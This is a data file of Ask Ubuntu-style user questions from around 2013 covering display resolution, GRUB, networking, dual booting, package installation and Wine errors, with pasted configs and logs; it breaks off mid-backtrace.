312700	ubuntu does n't give the intended screen resolution	i have recently created a ubuntu 12.04.2 64 bit virtual machine on virtualbox , and i am not very used to linux ( i used linux mint for a few weeks some time ago ) , so please refer the full name of stuff , not just `` the what-not-command '' . the problem is i ca n't set the full resolution my computer supports ( i think it is 1366 by 768 ) , i have found similar questions and tried most of the respective solutions , thy did not work . if i type xrandr to the terminal i get : xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 61.0* 800x600 61.0 640x480 60.0 as you can see , the maximum is too low . and in the settings of the screen ( i mean , with gui ) only 1024x768 and 800x600 appear . i do n't remember exactly which answer of those questions , but it was one in the terminal ( again , with xrandr ) that made the resolution i wanted appear ( although it gave an error when selected , not even changing to the 1366x768 resolution first and then back to 1024x768 ) .
312707	long startup time	a fresh ubuntu 13.04 install has good startup time for me . after that , when i began installing new softwares , my statup time went very very longer ( about 1 minute ) : ( i google my issue but i could not find anything . so i installed bootchart and it gave me this chart : bootchart image but i cant understand anything that can be useful and i checked disks ( gnome-disk-utility ) but i did not see anything that can make a problem . my notebook : asus n56vz ( corei7 , 8 gig , 1tb 5400 rpm ) with regular ubuntu 13.04 installation ( not wubi )
312709	slovedhow come java 7 wont uninstall ?	i installed openjdk wich worked perfectly , then i installed oracle java 7 then i tried to delete java 7 in many ways but java 7 wouldent uninstall completely . so now i have openjdk6 , minecraft that wont open and and corrupted java 7 on my hard drive . how can i completely take java 7 off my hard drive and fix minecraft ? i have tried sudo apt-get purge , sudo apt-get remove , and many other ways .
312718	/etc/network/interfaces does n't always take affect	for some reason my eth0 does not have internet on reboot sometimes . i am using a static ip . i can ping my gateway , but i am unable to ping dns servers , or anything out of my network . it seems that when my internet does work ( usually but just restarting enough times ) , my /etc/resolv.conf has a nameserver in it . it is empty when i have no internet access . i believe something is overwriting my interfaces settings sometimes on boot . any help would be appreciated . i am running ubuntu server 12.04 64bit /etc/network/interfaces : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 173.213.192.234 netmask 255.255.255.248 network 173.213.192.232 broadcast 173.213.192.239 gateway 173.213.192.233 dns-nameservers 8.8.8.8 auto eth1 iface eth1 inet static address 10.0.0.106 netmask 255.255.255.0 gateway 10.0.0.1
312725	ubuntu 12.04-2 does not install with uefi	i 'm in trouble to instal ubuntu in insipiron 14z . i 've already created this question ( that was wrongly marked as duplicated ) : first question but , the error seems to be with uefi . if i disable uefi on bios setup , i can get into installation process of ubuntu normally . but , i did n't finish the installation process because i think that will screw windows 8 installation . so my questions is : ubuntu installation should work with uefi . so , why it did n't ? knowing that the error is with uefi . i can forget the errors listed here ? edit : in the answer of duplicated question , look at this step : in this part i ca n't help much since each bios is different for each motherboard model . there are 2 options you can take here , both of which are optional since ubuntu might install without any problems at all . you can either look for an option to disable secure boot or an option to disable uefi . in some cases you will be able to find both , it will show in the bios as an option called secure boot or enable uefi . and look at this topic on ubuntu documentation : if the other systems ( windows vista/7/8 , gnu/linux ... ) of your computer are installed in efi mode , then you must install ubuntu in efi mode too . i prefer to follow ubuntu documentation and do not install ubuntu with uefi disabled . so , if i install ubuntu with uefi disabled , both os will work ?
312726	host grub error after installing virtualbox - non recoverable	i have been unable to fine a resolution to my problem and i have been suffering from it for a while . i can install virtualbox and can reboot the machine successfully straight after . once the system is back up i can run virtualbox ans start working towards creating a new machine . so , say i am installing an xp machine . 1 time out of 10 it will work successfully first time . if it does n't work ( i.e bsod ) , i delete the machine and start again . but when the time comes to finish up and switch off my computer , but it does n't happen gracefully . as soon as i click shutdown , the machine dies . when the machine is switched back on i get : error : no such device grub resuce > i boot up my grub fix live cd , but the grub reinstaller get stuck on searching for partitions , gparted just get stuck looking for devices and even fdisk -l drops a line and displays nothing and is the same . stuck . the only way i know how to sort it is by re-installing ubuntu . has anyone had this problem , or know how to fix it ? /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=117df936-b581-4f8d-9c95-84ad0a9d6eb7 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=7ff0d94e-dd35-450b-8ed4-6a126d76cca6 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /boot/grub/grub.cfg # do not edit this file # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 117df936-b581-4f8d-9c95-84ad0a9d6eb7 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 117df936-b581-4f8d-9c95-84ad0a9d6eb7 set locale_dir= ( $ root ) /boot/grub/locale set lang=en_gb insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=2 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 117df936-b581-4f8d-9c95-84ad0a9d6eb7 insmod png if background_image /usr/share/images/desktop-base/spacefun-grub.png ; then set color_normal=light-gray/black set color_highlight=white/black else set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.5.0-34-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 117df936-b581-4f8d-9c95-84ad0a9d6eb7 linux /boot/vmlinuz-3.5.0-34-generic root=uuid=117df936-b581-4f8d-9c95-84ad0a9d6eb7 ro initrd /boot/initrd.img-3.5.0-34-generic } menuentry 'ubuntu , with linux 3.5.0-34-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 117df936-b581-4f8d-9c95-84ad0a9d6eb7 echo 'loading linux 3.5.0-34-generic ... ' linux /boot/vmlinuz-3.5.0-34-generic root=uuid=117df936-b581-4f8d- 95-84ad0a9d6eb7 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-34-generic } submenu `` previous linux versions '' { menuentry 'ubuntu , with linux 3.5.0-23-generic ' -- class ubuntu -- class gnu-linux -class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 117df936-b581-4f8d-9c95-84ad0a9d6eb7 linux /boot/vmlinuz-3.5.0-23-generic root=uuid=117df936-b581-4f8d- 95-84ad0a9d6eb7 ro initrd /boot/initrd.img-3.5.0-23-generic } menuentry 'ubuntu , with linux 3.5.0-23-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 117df936-b581-4f8d-9c95-84ad0a9d6eb7 echo 'loading linux 3.5.0-23-generic ... ' linux /boot/vmlinuz-3.5.0-23-generic root=uuid=117df936-b581-4f8d- 95-84ad0a9d6eb7 ro recovery nomodeset echo 'loading initial ramdisk ... initrd /boot/initrd.img-3.5.0-23-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 117df936-b581-4f8d-9c95-84ad0a9d6eb7 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 117df936-b581-4f8d-9c95-84ad0a9d6eb7 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # installation log for virtualbox jonathon @ bacage : ~ $ sudo apt-get install virtualbox [ sudo ] password for jonathon : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : dkms fakeroot libgsoap1 virtualbox-dkms virtualbox-qt suggested packages : virtualbox-guest-additions-iso vde2 the following new packages will be installed dkms fakeroot libgsoap1 virtualbox virtualbox-dkms virtualbox-qt 0 upgraded , 6 newly installed , 0 to remove and 0 not upgraded . need to get 23.7 mb of archives . after this operation , 71.4 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/main dkms all 2.2.0.3-1ubuntu3.1 [ 73.2 kb ] get:2 http : //gb.archive.ubuntu.com/ubuntu/ precise/main fakeroot i386 1.18.2-1 [ 87.9 kb ] get:3 http : //gb.archive.ubuntu.com/ubuntu/ precise/universe libgsoap1 i386 2.8.4-2 [ 518 kb ] get:4 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/universe virtualbox i386 4.1.12-dfsg-2ubuntu0.3 [ 15.8 mb ] get:5 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/universe virtualbox-dkms all 4.1.12-dfsg-2ubuntu0.3 [ 676 kb ] get:6 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/universe virtualbox-qt i386 4.1.12-dfsg-2ubuntu0.3 [ 6,523 kb ] fetched 23.7 mb in 54s ( 433 kb/s ) selecting previously unselected package dkms . ( reading database ... 225007 files and directories currently installed . ) unpacking dkms ( from ... /dkms_2.2.0.3-1ubuntu3.1_all.deb ) ... selecting previously unselected package fakeroot . unpacking fakeroot ( from ... /fakeroot_1.18.2-1_i386.deb ) ... selecting previously unselected package libgsoap1 . unpacking libgsoap1 ( from ... /libgsoap1_2.8.4-2_i386.deb ) ... selecting previously unselected package virtualbox . unpacking virtualbox ( from ... /virtualbox_4.1.12-dfsg-2ubuntu0.3_i386.deb ) ... selecting previously unselected package virtualbox-dkms . unpacking virtualbox-dkms ( from ... /virtualbox-dkms_4.1.12-dfsg-2ubuntu0.3_all.deb ) .. selecting previously unselected package virtualbox-qt . unpacking virtualbox-qt ( from ... /virtualbox-qt_4.1.12-dfsg-2ubuntu0.3_i386.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for menu ... processing triggers for shared-mime-info ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' processing triggers for hicolor-icon-theme ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... setting up dkms ( 2.2.0.3-1ubuntu3.1 ) ... setting up fakeroot ( 1.18.2-1 ) ... update-alternatives : using /usr/bin/fakeroot-sysv to provide /usr/bin/fakeroot ( fakeroot ) in auto mode . setting up libgsoap1 ( 2.8.4-2 ) ... setting up virtualbox ( 4.1.12-dfsg-2ubuntu0.3 ) ... * stopping virtualbox kernel modules [ ok ] * starting virtualbox kernel modules * no suitable module for running kernel found [ fail ] invoke-rc.d : initscript virtualbox , action `` restart '' failed . processing triggers for python-central ... setting up virtualbox-dkms ( 4.1.12-dfsg-2ubuntu0.3 ) ... loading new virtualbox-4.1.12 dkms files ... first installation : checking all kernels ... building only for 3.5.0-34-generic building initial module for 3.5.0-34-generic done . vboxdrv : running module version sanity check . original module no original module exists within this kernel installation installing to /lib/modules/3.5.0-34-generic/updates/dkms/ vboxnetadp.ko : running module version sanity check . original module no original module exists within this kernel installation installing to /lib/modules/3.5.0-34-generic/updates/dkms/ vboxnetflt.ko : running module version sanity check . original module no original module exists within this kernel installation installing to /lib/modules/3.5.0-34-generic/updates/dkms/ vboxpci.ko : running module version sanity check . original module no original module exists within this kernel installation installing to /lib/modules/3.5.0-34-generic/updates/dkms/ depmod ... ... ... . dkms : install completed . stopping virtualbox kernel - modules [ ok ] starting virtualbox kernel modules [ ok ] setting up virtualbox-qt ( 4.1.12-dfsg-2ubuntu0.3 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for menu ... jonathon @ bacage : ~ $
312730	unable to unmount encfs encryped folder in cryptkeeper	i have encfs encrypted directory mounted with cryptkeeper . if i try to unmount that directory from nautilus by pressing `` eject '' button it will show the following error : `` unmount : /home/xxxxx/encrypted is not in fstab ( and you are not root ) '' how to solve this problem ?
312731	tunneling x11vnc through ssh on a non standard port to ubuntu computer tightvnc	i have been stuck with setting up my virtual desktop on my ubuntu laptop . i am running ubuntu to ubuntu with x11vnc i start the process on my laptop as follows : `` ssh -l5904 : localhost:5900 -p port remoteuser @ remoteip . '' that command works , then i start x11vnc server , `` x11vnc -noncache -once -shared -rfbauth ~/.vnc/passwd . '' this command works and starts connection . then i open another window on my laptop and type , export vnc_via_cmd='/usr/bin/ssh -2 -c aes128-cbc -x -p port -l user -f - : % l : % h : % r % g sleep 20 ' ( not sure if works ) . then i type , vncviewer -endcodings tight -depth 8 -quality 1 -via ipofremotemachine -u remoteuser localhost:01 . the first time it work but from now on it just gives me the vncviewer -help screen everytime . i type in the password for my remote machine and then shows -help screen for vncviewer . i think the problem is with tightvnc viewer but do n't know what . please help . i got some info on www.vanemery.com/linux/vnc/vnc-over-ssh.htmlâ .
312736	any news concerning flash-alternatives in linux/ubuntu ( june 2013 ) ?	i know about gnash and lightspark but have only tested them some time ago , and they were not too great . considering adobe giving up linux support and the hopes for a linux alternative - how are things at the present ?
312737	from where ubuntu one music store gets its musics ?	i wish to know , where the ubuntu one music store musics come from ? it is from amazon ? if it is , why there is some musics available in amazon that is unavailable in ubuntu one music store ? how can i get them ? thanks .
312745	comparing my version with the clean install	i 've been using and upgrading ubuntu since the version 9 . of course , i have 13.04 now and after installing a clean 13.04 to another computer , i 've noticed quite a few differences ( plymouth , lightdm , some software behaves differently , etc. ) . i 've done quite a few customizations during the period so it 's probably due to that . so i wonder if there is a way to see what 's different between my and the clean version . not the complete file list diff , but perhaps software package differences ( synaptic ? ) or something that will be easier to read and compare . is there a way ?
312747	recovering data from hard disk after an accidental ubuntu reinstallation	my computer got wiped accidentally due to a fresh ubuntu installation . since the drive contains very important data and codes , it would be really great if the same could be recovered . it is a 2tb hard drive which had ubuntu 10.10 earlier . it now has a ubuntu 12.04 installed on it ( which i understand occupies ~4gb ) . the machine has been powered off since . the installation was done using a usb with the option where the previous ubuntu installation is removed . since installation does n't take a lot of time , i 'm inclined to think that the disk was n't completely formatted and that most of the data is still there . i have no experience with recovery and hence a detailed explanation is very helpful . note : i can arrange an additional 2tb hard disk for copying data . my computer has a fast internet connection and i have other computers connected to the network which i may use to access the previous one as well .
312748	malformed line 6 in source list /ect/apt/sources.list when trying to fix software center	my software center wo n't open . so someone told me to re-install it and one command that i was told to do was sudo apt-get update which is failing to run , saying it can not read line 6 . # /etc/apt/sources.list deb http : //archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu/ precise-security main deb http : //archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse deb http : //archive.canonical.com/precise partner deb-src http : //archive.canonical.com/precise partner nothing i found fixed this error . can someone tell me what 's wrong with the file ? thanks !
312752	can i safely store and display a master password file with aes-encrypted file plus a few simple bash scripts ?	i would like to set up a couple of bash scripts to encrypt and decrypt a master text file containing passwords for banking , work , etc . for the purpose of editing it and displaying the entries when i need to look something up . i would prefer to use as few third-party sources as possible , and have a possible solution ( ? ) using just a standard terminal : openssl text editor of choice shred my question is , can anyone provide a reason why this is not a good idea , from a security point of view ? by that i mean i would like to avoid losing those passwords to casual hacking attempts ( i give up if the nsa comes a-knocking ) . let me explain in more detail . i have 3 bash scripts listed below , in which $ pfile is a path variable pointing to the directory containing of the password file , and passfile.enc is the encrypted file ( the names of the victims have been changed to protect their identity ) . mypasswds.open : opens a predetermined password file encrypted using aes 256-bit encryption via openssl . it opens the file externally in , e.g. , gedit , so i can easily modify the entries save the updated file . # ! /bin/bash openssl aes-256-cbc -d -in $ pfile/passfile.enc -out $ pfile/passfile.tmp gedit $ pfile/passfile.tmp & mypasswds.close : closes , i.e. , re-encrypts the file once i am done editing it , and removes the decrypted text file . # ! /bin/bash openssl aes-256-cbc -in $ pfile/passfile.tmp -out $ pfile/passfile.enc shred -- remove $ pfile/passfile.tmp mypasswds.display : writes the output of passfile.enc to the terminal window , and then immediately removes the decrypted file . the idea would be to look at the terminal output to recall the password , and then close it immediately after . # ! /bin/bash openssl aes-256-cbc -d -in $ pfile/passfile.enc -out $ pfile/passfile.tmp cat $ pfile/passfile.tmp shred -- remove $ pfile/passfile.tmp for example , if i want to add a new password entry to the file , i run mypasswds.open and enter my ( randomly-generated and painstakingly memorized ) master password . the text file opens in , for example , gedit and i update it . i then save and close the editor , and run mypasswds.close to re-encrypt and remove the temporary , unencrypted file . if i just want to look something up , i run mypasswds.display , look at the output to the terminal to refresh my memory , and immediately close the terminal window . questions / doubts that come to mind : does terminal output get stored somewhere upon closing the terminal window ? or is gone forever ? is shred -- remove a secure option for completely destroying the temporary text file ? if someone were to obtain the encrypted file , is it possible to decipher , and with what amount of effort ? if this whole idea is for the birds ( why ? ) , that is valuable information too ! thanks in advance .
312755	sansa clip zip does not mount on ubuntu 13.04	i use ubuntu 13.04 , and my sansa clip zip mp3 player ( uses usb ) does not mount . i am new to ubuntu so i 'm not sure how to proceed when it says : unable to open device ' [ usb:001,011 ] ' ?
312756	what are the default permissions of /etc/fstab ?	i changed the permissions of my fstab file to 777 . what were the default permissions ?
312759	why is the monospace font of ubuntu different from the monospace font of opensuse ?	the fonts are both named `` monospace '' but they do n't look alike , iâ wonder why .
312767	installing pygame with pip	i 'm trying to install pygame using pip in a virtualenv . i 'm following this tutorial on using kivy . however , running pip install pygame returns downloading/unpacking pygame downloading pygame-1.9.1release.tar.gz ( 2.1mb ) : 2.1mb downloaded running setup.py egg_info for package pygame warning , no `` setup '' file exists , running `` config.py '' using unix configuration ... /bin/sh : 1 : sdl-config : not found /bin/sh : 1 : smpeg-config : not found hunting dependencies ... warning : `` sdl-config '' failed ! warning : `` smpeg-config '' failed ! unable to run `` sdl-config '' . please make sure a development version of sdl is installed . no files/directories in /tmp/pip-build-root/pygame/pip-egg-info ( from pkg-info ) storing complete log in /home/david/.pip/pip.log the content of /home/david/.pip/pip.log can be found at http : //paste.ubuntu.com/5800296/ what am i doing wrong ? i 'm trying to keep to the standard methodology for installing pygame as much as possible in order to avoid deviating from the tutorial .
312771	is running programs by address common ?	i have read some of the things posted here and i keep reading about people running stuff like /foldername/executable -cmd name ( was reading about a programmer using eclipse , so he was testing something he made ) i do n't see things like that when i run things here ( ubuntu 12.04 ) because of the launcher and the ubuntu button at the very top . that and eclipse indigo has a button for running and testing things it makes . just asking how and why it 's common ? ( assuming it 's the terminal [ ctrl+alt+t ] but i 'm not sure )
312776	network interface ( onboard wired ) is showed p5p1 instead eth0	i 've running ubuntu 13.04 on my computer and it 's ok . but some softwares like media servers do n't work well . they search network interface eth0 and ubuntu 13.04 named it p5p1 . so my media server does n't work . how can i change ubuntu 's network config file ? thanks marcelo
312777	is it possible to use the raring install image as a package repo ( like the old alternate cd ) ?	i use kubuntu and recently upgraded to raring directly from precise . until precise , i always installed the os using the alternate cd and not the desktop cd , because i could later on mount the image and use it as an offline package repo . for instance if i remove a package installed by the default installer and later i want to install it again , i can just install it from the iso without needing to download it again . however , since quantal the alternate cd no longer exists , so i am not sure how to set up the installed image as a local repo . i mean , doing find . -name `` *.deb '' inside the iso tree after loopmounting it only shows a few packages like libc6 gcc and such and not the full set of packages that are actually installed -- i presume they are included in pre-installed form inside casper/filesystem.squashfs . given this situation , is it or is it not possible to use the raring install images as offline repos ? if yes , how ? thank you ! edit : quite a few people marked this as a dup of : how to use a .iso image as a cd-rom repository ? but the steps outlined there ( that thread is from 2010 ) do not work with the raring image . iiuc they would work only with the alternate images and they are not available any more . so anyway i tried those instructions and did : $ mount | grep loop /mnt/sda8/samjnaa/ai/ubuntu/raring/kubuntu-13.04-desktop-amd64.iso on /mnt/loop0 type iso9660 ( ro ) $ sudo apt-cdrom -d /mnt/loop0/ add using cd-rom mount point /mnt/loop0/ unmounting cd-rom waiting for disc ... please insert a disc in the drive and press enter mounting cd-rom ... e : failed to mount the cdrom .
312782	how to install ubuntu on separate hard drive in a dual boot ?	i have already installed win 7 on c drive now i want to install ubuntu on e drive which is free partition . how to install ?
312785	eclipse : avd not appearing	i have installed the adt bundle for 32 bit . using ubuntu 12.04 updated it a bit and installed the 2.3.3 android version . i have eclipse indigo . when i use the android virtual machine manager , after choosing a device , i get the progress bar after pressing `` start '' but it disappears when it finishes and no virtual machine appears . no errors , too . i fear it would be a problem with my ram ( laptop 's = 512 ( or less ) . allocated to device = 128 - 300 ) , having been told by a teacher that the emulator requires 2 gb ram . i would like confirmation and/or solution .
312787	compiz fusion and unity tool	i tried to install compiz fusion on ubuntu studio 13 and all i got was this some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : compiz-fusion-plugins-extra : i386 : depends : compiz-core : i386 but it is not going to be installed depends : compiz-fusion-plugins-main : i386 but it is not going to be installed recommends : compizconfig-settings-manager : i386 but it is not going to be installed compiz-gnome : depends : libcompizconfig0 but it is not going to be installed compizconfig-settings-manager : depends : python-compizconfig ( > = 1:0.9.9~daily13.04.18.1~13.04-0ubuntu1 ) but it is not going to be installed libcompizconfig-backend-gconf : i386 : depends : libcompizconfig0 : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . david @ nebuchadnezzar : ~ $ also i installed unity tweak tool through the software center , and now i can not find it at all , not even in search apps . i feel like every time i try to install something i have to jump through flaming hoops ...
312789	replacing mint 15 with ubuntu gnome 13.04	is there a way of replacing mint 15 with ubuntu gnome 13 and keeping all my files ?
312791	how to dual boot windows 7 and ubuntu in 32gb ssd	in my system i have a 32gb ssd and a 500gb hdd . i want to dual boot my windows os and ubuntu os in the same ssd harddisk..but i am unable to do that ... afterwards i tried to install both the os in my 500 gb hdd , but it then also is not dual booting ... . then i have tried to boot my ubuntu in 32 ssd & windows 7 in hdd , so while booting it starts with windows 7 ... so my question is first of all how to dual boot windows 7 and ubuntu in 32 gb ssd.. and if not possible then ... why is it not booting from 500gb hdd.. please help me ... .. thanxx in advance..
312795	ubuntu windows8	hi there i want to use 2 different operating systems on my laptop it have highly definitions but i need to know this : i have windows 8 installed i have 1 hard disk not divided into 2 , on my laptop can i install ubuntu side by side to windows 8 without losing data ? and how . i did n't try anything yet because i need to know if it will corrupt my windows 8 or not or i might lose data .
312799	ubuntu 12.04.2 : grub was apparently not installed	sorry if this is a silly question but i 'm incredibly new at all this . i 'm trying to use ubuntu 12.04 . i installed it from the usb stick and it went fine , said to reboot , but after rebooting it opens windows - there 's no ubuntu option . i 'm not sure what to do . i do n't mind running it from the usb if i could figure out how to do that - i just need to use ubuntu !
312801	how do i change the caption of the `` login '' button ?	when setting up a user for login without a password ( i.e. , by adding the user to the nopasswdlogin group ) , a `` login '' button appears in the lightdm screen . how do i change the caption on the login button , e.g . to `` enter '' or `` start '' ? thanks in advance for any response .
312803	ok , i just installed ubuntu 12.04 on my powerbook g4 , 1.33 17 '' . can i partition and set dual boot mac os x ? ( with out losing the ubuntu )	so get this , i find lots of dual booting help if i install the mac os x software first , and i even have the original bootcamp disks and such , but i have ubuntu working perfectly on the machine as my only operating system and it wasnt exactly simple . is there a way i can partition the drive from ubuntu and dual ( re-install ) the mac os x ?
312804	how to make my daemon appear in service -- status-all list ?	i have setup upstart script and init.d script for my daemon and its working good . i want my daemon appear in service -- status-all list . update-rc.d < my-daemon > defaults did n't put my daemon in service list . how can i do that ?
312816	awk programming - changing a field value conditionally	i 'm a beginner in awk programming . this post is to clarify a doubt . i have file like this : 70 17 5 mb 71 18 6 ms 72 19 7 ml 73 20 8 mw in which 4th column is a string . i want to make changes in the 3rd column with respect to 4th column . for example : to read the 4th column , if $ 4=ms then $ 3= $ 3+1 . actually i do n't know how to make the program read string ms . please help me regarding this !
312820	error installing ms office in ubuntu 13.04	while i am installing ms office 10 or 13 using wine it says the following : unhandled exception : 0xc06d007e in 32-bit code ( 0x7b83ae0b ) . register dump : cs:0023 ss:002b ds:002b es:002b fs:0063 gs:006b eip:7b83ae0b esp:0a6cd3f8 ebp:0a6cd45c eflags:00000287 ( - -- i s - -p-c ) eax:7b826449 ebx:7b8b0000 ecx:0a6cd480 edx:0a6cd41c esi:00dd2428 edi:00000000 stack dump : 0x0a6cd3f8 : 0a6cd4d0 00000004 000a0009 c06d007e 0x0a6cd408 : 00000000 00000000 7b83ae0b 00000001 0x0a6cd418 : 0a6cd480 7b8589db 7ffd0c00 00000000 0x0a6cd428 : 00000000 00000000 00000000 00000000 0x0a6cd438 : 00000000 7ffd0c00 00000000 7b8b0000 0x0a6cd448 : 0a6cd468 7b858b2e 00dd24c0 00000000 backtrace : = > 0 0x7b83ae0b in kernel32 ( +0x2ae0b ) ( 0x0a6cd45c ) 1 0x00dc93bb in msi7bec.tmp ( +0x493ba ) ( 0x0a6cd4c4 ) 2 0x00dc78d8 in msi7bec.tmp ( +0x478d7 ) ( 0x0a6cd704 ) 3 0x00dc28cd in msi7bec.tmp ( +0x428cc ) ( 0x0a6cd940 ) 4 0x00d9caf8 in msi7bec.tmp ( +0x1caf7 ) ( 0x0a6ce83c ) 5 0x7def9393 customproc_wrapper+0xa ( ) in msi ( 0x0a6ce848 ) 6 0x7def9671 customproc_wrapper+0x2e8 ( ) in msi ( 0x0a6ce9a8 ) 7 0x7def994f customproc_wrapper+0x5c6 ( ) in msi ( 0x0a6ce9f8 ) 8 0x7bc7f84c call_thread_func_wrapper+0xb ( ) in ntdll ( 0x0a6cea08 ) 9 0x7bc7f89b call_thread_func+0x44 ( ) in ntdll ( 0x0a6ceae8 ) 10 0x7bc7f82a in ntdll ( +0x6f829 ) ( 0x0a6ceb08 ) 11 0x7bc871f3 in ntdll ( +0x771f2 ) ( 0x0a6cf368 ) 12 0xf75c5d78 start_thread+0xd7 ( ) in libpthread.so.0 ( 0x0a6cf468 ) 13 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 14 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 15 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 16 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 17 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 18 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 19 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 20 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 21 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 22 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 23 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 24 0xf74fc3de __clone+0x5d 